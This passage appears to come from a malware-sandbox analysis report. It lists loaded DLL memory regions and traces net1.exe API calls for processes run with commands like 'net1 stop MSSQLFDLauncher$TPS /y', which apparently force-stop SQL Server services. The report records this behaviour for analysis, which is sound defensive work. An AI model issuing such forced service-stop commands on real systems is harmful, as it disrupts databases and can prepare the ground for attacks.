0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8598 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8599 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8600 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8601 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8602 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8603 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8604 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8605 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8606 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8607 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8608 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8609 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8640 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 679 os_tid = 0xa3c [0106.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f930 | out: lpSystemTimeAsFileTime=0x14f930*(dwLowDateTime=0xf4a9b070, dwHighDateTime=0x1d48689)) [0106.557] GetCurrentProcessId () returned 0xad4 [0106.557] GetCurrentThreadId () returned 0xa3c [0106.557] GetTickCount () returned 0x24604 [0106.557] QueryPerformanceCounter (in: lpPerformanceCount=0x14f938 | out: lpPerformanceCount=0x14f938*=1815347600000) returned 1 [0106.559] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0106.559] __set_app_type (_Type=0x1) [0106.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0106.560] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0106.560] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.560] GetConsoleOutputCP () returned 0x1b5 [0106.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0106.654] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.656] sprintf_s (in: _DstBuf=0x14f8d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.656] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.658] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0106.658] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0106.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f670, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0106.658] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.658] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f8c8 | out: Buffer=0x14f8c8*=0x1ec0f0) returned 0x0 [0106.658] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f8c8 | out: Buffer=0x14f8c8*=0x1ec110) returned 0x0 [0106.658] _fileno (_File=0x7fefdba2a80) returned 0 [0106.658] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0106.658] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.658] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.658] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.658] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.659] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.659] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.659] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.659] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.659] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.659] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.659] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.659] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.659] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.659] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.659] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.659] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.659] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.659] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.659] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.659] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.659] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.659] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0106.659] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0106.659] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0106.659] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0106.659] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -10 [0106.659] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0106.659] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -7 [0106.659] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0106.659] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -6 [0106.659] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0106.659] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -5 [0106.659] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0106.659] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0106.659] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.659] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 7 [0106.660] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0106.660] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 8 [0106.660] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0106.660] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -14 [0106.660] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0106.660] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0106.660] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0106.660] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0106.660] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0106.660] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 5 [0106.660] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0106.660] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0106.660] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 10 [0106.660] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 3 [0106.660] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -9 [0106.660] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0106.660] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 6 [0106.660] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -1 [0106.660] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned -12 [0106.660] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SYSTEM_BGC") returned 1 [0106.660] _wcsupr (in: _String="MSSQLFDLauncher$SYSTEM_BGC" | out: _String="MSSQLFDLAUNCHER$SYSTEM_BGC") returned="MSSQLFDLAUNCHER$SYSTEM_BGC" [0106.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1ece20 [0106.665] GetServiceKeyNameW (in: hSCManager=0x1ece20, lpDisplayName="MSSQLFDLAUNCHER$SYSTEM_BGC", lpServiceName=0xffa35750, lpcchBuffer=0x14f7e8 | out: lpServiceName="", lpcchBuffer=0x14f7e8) returned 0 [0106.666] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0106.666] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -14 [0106.666] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0106.666] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0106.666] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0106.666] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0106.666] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 5 [0106.666] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0106.666] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0106.666] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 10 [0106.666] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 3 [0106.666] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -9 [0106.666] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0106.666] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0106.666] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0106.666] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 6 [0106.666] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -1 [0106.666] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned -12 [0106.666] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SYSTEM_BGC") returned 1 [0106.666] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x14f7f0 | out: bufptr=0x14f7f0) returned 0x889 [0106.667] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.667] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0106.669] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.670] GetFileType (hFile=0xb) returned 0x2 [0106.671] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f6b8 | out: lpMode=0x14f6b8) returned 1 [0106.671] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f6b0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x14f6b0*=0x1e) returned 1 [0106.671] GetFileType (hFile=0xb) returned 0x2 [0106.671] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f6b8 | out: lpMode=0x14f6b8) returned 1 [0106.672] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f6b0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x14f6b0*=0x2) returned 1 [0106.672] _ultow (in: _Dest=0x889, _Radix=1373984 | out: _Dest=0x889) returned="2185" [0106.672] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.672] GetFileType (hFile=0xb) returned 0x2 [0106.672] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f6b8 | out: lpMode=0x14f6b8) returned 1 [0106.673] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f6b0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0x14f6b0*=0x34) returned 1 [0106.673] GetFileType (hFile=0xb) returned 0x2 [0106.673] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f6b8 | out: lpMode=0x14f6b8) returned 1 [0106.673] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f6b0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0x14f6b0*=0x2) returned 1 [0106.674] NetApiBufferFree (Buffer=0x1ec0f0) returned 0x0 [0106.674] NetApiBufferFree (Buffer=0x1ec110) returned 0x0 [0106.674] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" [0106.674] exit (_Code=2) Process: id = "220" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5d745000" os_pid = "0x7cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "211" os_parent_pid = "0x924" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8610 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8611 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8612 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8613 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 8614 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8615 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8616 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8617 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8618 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8619 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8620 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 8621 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8622 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 8623 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8624 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8641 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8642 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8643 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8644 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8645 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 8646 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8647 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8648 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8649 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8650 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8651 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8652 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8653 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8654 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8655 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8656 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8657 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8658 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8659 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8660 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8661 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8662 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8663 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8664 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 680 os_tid = 0x8d4 [0106.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fed0 | out: lpSystemTimeAsFileTime=0x12fed0*(dwLowDateTime=0xf4bcbb70, dwHighDateTime=0x1d48689)) [0106.675] GetCurrentProcessId () returned 0x7cc [0106.675] GetCurrentThreadId () returned 0x8d4 [0106.675] GetTickCount () returned 0x24681 [0106.675] QueryPerformanceCounter (in: lpPerformanceCount=0x12fed8 | out: lpPerformanceCount=0x12fed8*=1815359400000) returned 1 [0106.677] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0106.677] __set_app_type (_Type=0x1) [0106.677] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0106.677] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0106.678] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.678] GetConsoleOutputCP () returned 0x1b5 [0106.678] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0106.678] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.680] sprintf_s (in: _DstBuf=0x12fe78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.680] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.682] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0106.682] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" [0106.682] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0106.682] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.682] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe68 | out: Buffer=0x12fe68*=0x304d60) returned 0x0 [0106.682] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe68 | out: Buffer=0x12fe68*=0x30c130) returned 0x0 [0106.682] _fileno (_File=0x7fefdba2a80) returned 0 [0106.682] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0106.682] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.682] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.683] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.683] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.683] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.683] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.683] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.683] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.683] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.683] _wcsicmp 